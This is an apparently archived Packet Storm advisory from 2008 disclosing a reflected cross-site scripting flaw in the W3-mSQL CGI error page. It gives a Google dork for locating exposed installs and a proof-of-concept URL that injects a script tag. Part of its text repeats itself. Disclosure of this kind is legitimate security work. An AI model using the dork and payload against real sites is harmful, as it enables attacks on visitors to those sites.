Lucene search

K
packetstormVivekPACKETSTORM:62257
HistoryJan 03, 2008 - 12:00 a.m.

w3msql-xss.txt

2008-01-0300:00:00
Vivek
packetstormsecurity.com
11
`A reflected xss flaw exists in the w3-msql error page.  
  
google dork : "W3-mSQL Error! - Can't stat script file (/"  
  
Just insert a script from the start of /  
  
like if u get a URL like:-   
  
http://localhost/cgi-bin/w3-msql/journal/ijcd/index.html  
  
and the error page output as :-  
  
W3-mSQL Error! - Can't stat script file (/journal/ijcd/index.html)  
  
u can try this:-  
  
A reflected xss flaw exists in the w3-msql error page.  
  
google dork : "W3-mSQL Error! - Can't stat script file (/"  
  
Just insert a script from the start of /  
  
like if u get a URL like:-   
  
http://localhost/cgi-bin/w3-msql/<script>alert('xss')</script>  
  
to confirm the issue  
`